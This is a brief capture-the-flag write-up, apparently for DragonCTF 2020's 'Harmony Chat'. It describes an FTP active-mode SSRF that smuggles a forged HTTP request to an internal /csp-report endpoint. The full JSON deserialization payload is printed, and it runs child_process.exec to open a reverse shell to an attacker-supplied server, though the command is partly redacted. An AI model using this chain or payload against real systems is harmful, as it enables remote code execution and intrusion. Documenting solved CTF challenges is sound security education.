Tags: ftp ssrf deserialization
Rating: 3.0
* RCE is achievable via insecure deserialization on /csp-report endpoint in their HTTP server
* Make a chatlog that looks exactly like a POST request to said endpoint, with a reverse-shell payload in it (I made 5 users with names like ``POST /csp-report?``, ``Host``, etc etc). Download the chatlog via FTP to put the file in the server.
* Connect to their FTP server externally. Use FTP on active mode (PORT command) to send chatlog to the application’s HTTP server.
* reverse-shell. Profit.
Payload:
```
POST /csp-report?: HTTP/1.1
Host: localhost:3380
Content-Length: 386
Content-Type: application/csp-report
{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-directive": "X", "original-policy": "X", "referrer": "X", "status-code": "X", "violated-directive": "X", "source-file": {"toString": {"___js-to-json-class___": "Function", "json": "process.mainModule.require(\"child_process\").exec(\"REDACTED <YOURSERVERHERE> REDACTED ", {stdio:\"inherit\"})"}}}}
```
Comprehensive writeup [here](https://ubcctf.github.io/2020/11/dragonctf2020-harmony_chat/)